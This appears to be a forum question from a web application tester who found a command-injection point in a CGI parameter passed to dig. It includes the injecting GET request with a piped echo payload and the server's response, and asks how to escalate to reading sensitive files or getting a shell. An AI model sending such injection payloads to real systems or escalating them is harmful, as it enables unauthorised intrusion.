While testing a web application today, I came across a function that passed arguments to dig
in linux terminal. After some fiddling about I was able to pass the echo command using pipes and echo my input to the response however I failed to launch any other commands.
Now my question is that is it possible to use the echo command in a malicious way to access sensitive files on the system or gain a shell?
Here is the vulnerable GET request:
GET /cgi-mod/test.cgi?dig_device=8.8.8.8"|echo%20abc123%20|| HTTP/1.1
Host: test.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
And here is the response:
HTTP/1.1 200 OK
Server: TestServer
Date: Mon, 02 May 2016 11:03:40 GMT
Content-Type: text/html
Connection: close
Status: 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 1576
<html><head><meta charset="utf-8" /><title></title></head><body><pre><!--
; <<>> DiG 9.4.1-P1 <<>> abc123
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32623
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;abc123. IN A
;; ANSWER SECTION:
abc123. 10 IN A 104.239.213.7
abc123. 10 IN A 198.105.254.11
;; Query time: 69 msec
;; SERVER: 4.2.2.1#53(4.2.2.1)
;; WHEN: Mon May 2 04:03:41 2016
;; MSG SIZE rcvd: 56